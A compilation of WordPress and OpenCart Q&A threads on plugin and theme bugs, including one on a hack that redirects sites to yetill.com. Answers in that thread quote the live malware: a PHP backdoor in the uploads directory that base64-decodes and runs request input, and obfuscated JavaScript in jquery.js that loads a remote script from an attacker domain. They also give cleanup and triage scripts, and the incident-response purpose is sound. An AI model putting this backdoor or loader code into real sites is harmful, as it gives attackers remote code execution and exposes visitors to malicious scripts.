Wordpress upload media tool double iframe? How to fix? - wordpress

I'm using the WordPress upload media tool within my plugin and there's an unusual error going on: I get two iframes that overlap. I searched online and there's not much info out there. The one that made the most sense was that thickbox was included twice and that's causing the problem, but within my plugin code I have it included only once.
This is the code I'm using to open the window:
media-upload.php?type=image&TB_iframe=true&tab=library&width=640&height=640
and when I take off "TB_iframe=true" then I see the two iframes under each other; otherwise they overlap and I only see double titles.
And this is the PHP code:
if (isset($_GET['page']) && ($_GET['page'] == 'add_images' || $_GET['page'] == 'add_slides')) {
    add_action("admin_enqueue_scripts", "load_fixedly_media_upload_header");
}
function load_fixedly_media_upload_header() {
    wp_enqueue_script('media-upload');
    wp_enqueue_script('thickbox');
    wp_register_script('my-fixedly-upload', WP_PLUGIN_URL . '/fixedly/scripts/admin.js', array('jquery','media-upload','thickbox'));
    wp_enqueue_script('my-fixedly-upload');
    wp_enqueue_style('thickbox');
}

Related

Did anyone notice this problem in WordPress?

I found a weird bug in cropping images in WordPress.
I used WP_Customize_Cropped_Image_Control to crop an image. In there I set the width to 750 and the height to 500.
That works well, but it was showing an error while cropping some other images.
*It made me crazy. After spending so many hours, I realized that it (the error and the cropping frame not showing) occurs with images
that have the same aspect ratio as I provided in WP_Customize_Cropped_Image_Control (if the aspect ratio matches, the error occurs).
If I don't provide the aspect ratio and set flex width and height, then it works well.
*The other thing I noticed is that I have a wide image that is 1920 x 742,
which takes the whole width of the Crop Image modal of WordPress, so that is also causing the error (not showing the cropping frame and showing an error).
If I resize my browser window, then it shows the cropping frame and I can crop the image without any error.
After some long research, I understood that it is a known bug of a jQuery library that is used by Wordpress and this library has not been updated for a long time. There is a workaround but it is a bit tricky. If you really need it, here is the solution for the curious ones:
The file is /wp-includes/js/imgareaselect/jquery.imgareaselect.js
Copy your own version (do not make a change in core WP files) and put it like somewhere in your template directory for example a js directory. Find this code snippet:
imgWidth = $img.innerWidth();
imgHeight = $img.innerHeight();
change it to this
imgWidth = Math.ceil($img.innerWidth());
imgHeight = Math.ceil($img.innerHeight());
Then you should dequeue and deregister the core file and enqueue your version. In case you do not know how to do it, I also put it here for the ones who need it.
Put the code snippet in your functions.php file.
// change custom scripts example
add_action( 'wp_print_scripts', 'cleanup_scripts', PHP_INT_MAX);
add_action( 'wp_print_footer_scripts', 'cleanup_scripts', PHP_INT_MAX);
function cleanup_scripts() {
    wp_deregister_script('imgareaselect');
    wp_dequeue_script('imgareaselect');
    wp_enqueue_script('imgareaselect', get_template_directory_uri() . '/js/jquery.imgareaselect.min.js', array('jquery'), '1.0', true);
}
'imgareaselect' is the handle of the file that is used by Wordpress core.
I also put the source here in case you want to dig deeper.
https://github.com/google/web-stories-wp/issues/8398

WordPress version 5.x (Gutenberg) White/Blank screen: don't dequeue wp-embed.min.js

I've been fiddling quite a lot with an issue with the new Gutenberg editor in WordPress 5.x in which I experienced a white/blank screen when trying to edit a page.
What's weird is that I originally thought it was due to Yoast SEO (plugin) and an error with 'pluginSidebar', but disabling it didn't make a difference.
I also tried all the possible solutions I found, e.g.:
Delete browser cache
Delete server cache (W3TC)
Disable all plugins
Change theme (which actually solved it, but isn't a theme issue (see answer))
I solved a similar problem by deleting these lines. If you have similar expressions which change the behavior of scripts, they may cause problems. In my case, I deleted a function from the function.php file:
function js_async_attr($tag)
{
    # Add async to all remaining scripts
    return str_replace(' src', ' async="async" src', $tag);
}
add_filter('script_loader_tag', 'js_async_attr', 10);
I've chosen to create a question and answer it myself as I've been bothered with this issue quite some time, and I'm hoping it might help some others.
After several attempts at fixing it and multiple searches I've finally found the error through trial and error, and the issue stems from an old "tip" (e.g. from here) for speed optimization in which you disable the queuing of wp-embed.min.js (hook: wp-embed) such as below:
function my_deregister_scripts(){
    wp_dequeue_script( 'wp-embed' );
}
add_action( 'wp_footer', 'my_deregister_scripts' );
However, disabling/dequeuing the wp-embed causes Gutenberg to malfunction and return a white screen!
Solution: If you have the above line of code in your functions.php then try to remove it, if you experience a white screen.

Wordpress Site always redirects to yetill.com

Anyone who can help me how to fix my site?
It is always redirecting to yetill.com. I searched about this site and I learned that it is a kind of malware.
Tried various solutions found on the net but still not solved.
Thanks.
Preliminary steps:
Backup everything
Check the file wp-includes/js/jquery/jquery.js - the first line should only contain a comment like /*! jQuery v1.... Delete anything before that line (you made a backup, right?)
Check your /wp-content/uploads directory for suspicious files. In our case we had malicious files e.g. in this sub dir: /ultimatemember/temp/[random dir]/n.php - Delete those after making a backup.
Install WordFence WP plugin and scan your site
Double-check that wp-includes/js/jquery/jquery.js is still OK (it can be modified again)
Consider the WordFence option "Disable Code Execution for Uploads directory" to prevent future intrusions if that works for your site (test!).
Background:
We have the same problem. Wordfence noticed that the file wp-includes/js/jquery/jquery.js was modified on the server. Restoring it to the original version seemed to solve it. BUT, the file got infected quickly (hours?). So we do not know the source yet...
We found some suspicious code in /wp-content/uploads/ultimatemember/temp/[random dir]/n.php:
<?php file_put_contents('sdgsdfgsdg','<?php '.base64_decode($_REQUEST['q']));
include('sdgsdfgsdg'); unlink('sdgsdfgsdg'); ?>
That basically executes any PHP code from outside...
After deleting those files, the site seemed back to normal (couple of hours).
We also noticed a suspicious <a> tag in the page source; but not sure about its relevance.
<a class="html-attribute-value html-resource-link" target="_blank"
href="https://our.site/wordpress/wp-includes/js/jquery/jquery.js?ver=1.12.4"
rel="noreferrer noopener">https://our.site/wordpress/wp-includes/js/jquery/jquery.js?ver=1.12.4</a>
It seems that this is caused by the vulnerability of some plugins you might be using.
In my case it was the older version (prior to 2.22) of Ultimate Member plugin.
If you are using version 2.22 or earlier of this plugin, you should update this plugin immediately, and purge temp files. (https://wordpress.org/support/topic/malicious-files-in-ultimate-members-plugin/)
After that, search recently updated files with this command. (e.g. 15 days)
find ./ -type f -mtime -15
Chances are your WP jquery file and any files with the name "header" are infected.
/wp-includes/js/jquery/jquery.js
/wp-contents/your-theme/header.php
..
Remove the following script in your infected header files.
<script type='text/javascript' src='https://cdn.eeduelements.com/jquery.js?ver=1.0.8'></script>
It looks like this is inserted right after opening head tag and right before closing head tag. Make sure you delete both.
Remove maliciously inserted script from infected Jquery file or just replace the file with clean one from other WP Core installations.
I think this should fix the issue.
You will have to do some troubleshooting. It is either your theme or one of your plugins that contains the malicious code.
Follow these steps:
Switch to a default theme like TwentySeventeen - If the issue
persists, it means it is not your theme.
Deactivate all your active plugins and check the website - The issue should go away.
Begin reactivating your plugins, clearing the cache after each reactivation
and checking your website - Whenever the issue shows up again, it is
that plugin that's the culprit and you cannot use that plugin.
Hope this helps.
The jquery file was infected in my case. Just delete the code before /*! jQuery v1.12.4 | (c) jQuery Foundation | jquery.org/license */ and make sure that all of your plugins are updated and the site is secure. Also check the permissions of the files! That helped in my case.
We have the same error, these files were infected. This is the malicious code I've found in them.
wp-includes/js/jquery/jquery.js
(function() { "use strict"; var _0xa8bd=["\x47\x45\x54","\x6F\x70\x65\x6E","\x73\x65\x6E\x64","\x72\x65\x73\x70\x6F\x6E\x73\x65\x54\x65\x78\x74","\x68\x74\x74\x70\x73\x3A\x2F\x2F\x73\x72\x63\x2E\x65\x65\x64\x75\x65\x6C\x65\x6D\x65\x6E\x74\x73\x2E\x63\x6F\x6D\x2F\x67\x65\x74\x2E\x70\x68\x70","\x6E\x75\x6C\x6C","\x73\x63\x72\x69\x70\x74","\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74","\x74\x79\x70\x65","\x74\x65\x78\x74\x2F\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74","\x61\x73\x79\x6E\x63","\x73\x72\x63","\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64","\x68\x65\x61\x64"];function httpGet(_0xc4ecx2){var _0xc4ecx3= new XMLHttpRequest();_0xc4ecx3[_0xa8bd[1]](_0xa8bd[0],_0xc4ecx2,false);_0xc4ecx3[_0xa8bd[2]](null);return _0xc4ecx3[_0xa8bd[3]]}var curdomain=_0xa8bd[4];var newlink=httpGet(curdomain);if(newlink!= _0xa8bd[5]){(function(){var _0xc4ecx6=document[_0xa8bd[7]](_0xa8bd[6]);_0xc4ecx6[_0xa8bd[8]]= _0xa8bd[9];_0xc4ecx6[_0xa8bd[10]]= true;_0xc4ecx6[_0xa8bd[11]]= newlink;document[_0xa8bd[13]][_0xa8bd[12]](_0xc4ecx6)})()} })();
themes/yourtheme/header.php
<script type='text/javascript' src='https://cdn.eeduelements.com/jquery.js?ver=1.0.8'></script>
This is what I found today after running the Sucuri scanner. Hopefully this helps someone because this one is a nasty one. It appears in my case to be affecting the following files:
wp-admin/install.php
wp-includes/js/jquery/jquery.js
wp-includes/theme-compat/header-embed.php
wp-includes/theme-compat/header.php
Whatever it was seemed to have gone ham on my wp-includes directory.
I do run Ultimate Member plugin and I noticed someone mentioned before that earlier versions of this plugin had vulnerabilities. I run a multi-site network, and also noticed that two of the registration forms on my sub-sites had the default role of Administrator (what plugin vendor would find that secure as a default registration option?) with the auto approve option enabled (no verification emails). Apparently activating this plugin in a network environment requires some extra thorough review on those registration and sign in forms.
Had the same issue. jquery was infected and had to be replaced with the original version. The hacker probably used ultimatemember backdoor to upload a php file and execute it. I had to clean up the plugin temp directory.
Another observation was that the hack was forcing the modified jquery to load a script whose address was loaded from http://src.eeduelements.com/get.php . This gives them the flexibility to rotate the ads.
sudo grep --include=\*.php -rnw . -e "<script type='text/javascript' src='https://cdn.eeduelements.com/jquery.js?ver=1.0.8'></script>"
That, along with this answer below, helped me clean my files. It affected all of my websites but now seems to still persist on the site that had Ultimate Member on it. Still working on it. This PHP script was incredible though. Thanks to the writer for sure.
PHP/SSH regex script/command to delete identical malware code from many files
This is the php from the above answer. I just swapped out the find portion with the malicious stuff redirecting to yetill.
<?php
// Enter the string exactly as it appears and escape any single quotes
$find = '<script type=\'text/javascript\' src=\'https://cdn.eeduelements.com/jquery.js?ver=1.0.8\'></script>';
echo findString('./', $find);

// Recursively walk $path and remove $find from every .php file that contains it.
// Files are rewritten in place, so run this only on a tree you have backed up.
function findString($path, $find) {
    $return = '';
    ob_start();
    if ($handle = opendir($path)) {
        while (false !== ($file = readdir($handle))) {
            if ($file != "." && $file != "..") {
                if (is_dir($path.'/'.$file)) {
                    // Descend into the sub-directory and relay its report
                    $sub = findString($path.'/'.$file, $find);
                    if (isset($sub)) {
                        echo $sub.PHP_EOL;
                    }
                } else {
                    // Only files whose name ends in "php" are inspected
                    $ext = substr(strtolower($file), -3);
                    if ($ext == 'php') {
                        $filesource = file_get_contents($path.'/'.$file);
                        $pos = strpos($filesource, $find);
                        if ($pos === false) {
                            continue;
                        } else {
                            // The cleaning bit
                            echo "The string '".htmlentities($find)."' was found in the file '$path/$file' and exists at position $pos and has been removed from the source file.<br />";
                            $clean_source = str_replace($find, '', $filesource);
                            file_put_contents($path.'/'.$file, $clean_source);
                        }
                    } else {
                        continue;
                    }
                }
            }
        }
        closedir($handle);
    }
    $return = ob_get_contents();
    ob_end_clean();
    return $return;
}
?>
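A read-only triage pass over the checks the answers above describe (content before the jQuery banner, PHP files under the uploads directory, files referencing the injected script's domain), as an added example that is not part of any post in this thread. The function names are made up for illustration, and the WordPress root is assumed to be passed as the first argument.

```sh
#!/bin/sh
# Added example: reports only, changes nothing. Function names are illustrative.
# The domain and the paths are the ones quoted in the posts above.
MARKER='eeduelements.com'

# 0 if the file starts with the stock jQuery banner comment, 1 otherwise.
jquery_head_ok() {
    [ "$(head -c 12 "$1")" = '/*! jQuery v' ]
}

# PHP files under an uploads tree, such as the n.php dropper found there.
upload_php() {
    find "$1" -type f -iname '*.php' 2>/dev/null | sort
}

# PHP/JS files that contain the domain as a plain string. The code injected
# into jquery.js hex-escapes the domain, so this will not match it there;
# the banner check above is what catches that file.
marker_hits() {
    grep -rlF --include='*.php' --include='*.js' -e "$MARKER" "$1" 2>/dev/null | sort
}

# Print one line per finding; return 1 if anything was flagged, else 0.
triage() {
    root=$1
    jq="$root/wp-includes/js/jquery/jquery.js"
    report=$(
        if [ -f "$jq" ] && ! jquery_head_ok "$jq"; then
            echo "MODIFIED   $jq"
        fi
        upload_php "$root/wp-content/uploads" | sed 's/^/UPLOAD-PHP /'
        marker_hits "$root" | sed 's/^/MARKER     /'
    )
    [ -z "$report" ] && return 0
    printf '%s\n' "$report"
    return 1
}

if [ "$#" -gt 0 ]; then
    triage "$1"
fi
```

Because jquery.js "can be modified again" as noted above, the non-zero exit status makes this suitable for a scheduled job that alerts when a cleaned site is flagged a second time.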

detect mobile using wordpress

I am new to WordPress plugin development, but anyhow I have developed two shortcodes, i.e. [MY_SHORTCODE] and [MY_SHORTCODE_MOBILE]. Both are working fine, but now I want to make one enhancement: I want to write a new shortcode which detects the device; if the detected device is mobile then I want to call the shortcode [MY_SHORTCODE_MOBILE], otherwise I want to call [MY_SHORTCODE]. How can I do this? Please help me, guys.
You can do it via the plugin Mobile Detector,
or if you want to create your own you can start by using a mobile detection library (PHP):
mobile-detect
I understand your problem: you want to run a shortcode based on browser or mobile device.
Download the PHP file with the mobile detect code and put the code below where you want to run the shortcode:
<?php
$useragent=$_SERVER['HTTP_USER_AGENT'];
if(preg_match('/copy paste mobile detect code here from detectmobilebrowser.php',substr($useragent,0,4)))
{
    //header('Location: http://detectmobilebrowser.com/mobile');
    // this code runs for mobile devices
    echo do_shortcode("[MY_SHORTCODE_MOBILE]");
}
else{
    // this code runs for desktop browsers
    echo do_shortcode("[MY_SHORTCODE]");
}
?>

Adding CSS stylesheet to pages based on route in OpenCart

I'm using opencart (version 1.5.1.3.1) for a client store, and am wondering what the best way to code it so I can have certain stylesheets added for certain routes.
For example, on my category page I'd like to have a different stylesheet to the default one, or one that will override the default styles with my custom sheet. I have use for this for more than one route obviously, and want to do this with as few edits as possible, so as to reduce the number of edits in the framework should I need to upgrade at any stage (and with opencart's well known random changes and bug fix releases this is quite probable).
Open catalog/controller/common/header.php
Right after the line protected function index() { on a new line put
$route = empty($this->request->get['route']) ? 'common/home' : $this->request->get['route'];
$css_file = str_replace('/', '_', $route) . '.css';
if(file_exists(DIR_TEMPLATE . $this->config->get('config_template') . '/stylesheet/' . $css_file)) {
    $this->document->addStyle('catalog/view/theme/' . $this->config->get('config_template'). '/stylesheet/' . $css_file);
}
Then go to your current theme, and create a file in catalog/view/your-theme/stylesheet/ folder called product_category.css and put your styles in that. The stylesheets work off your route name except you replace the forward slash to an underscore followed by .css, ie common/home becomes common_home.css
Note that this is going to use the override method rather than replacing your default stylesheet.
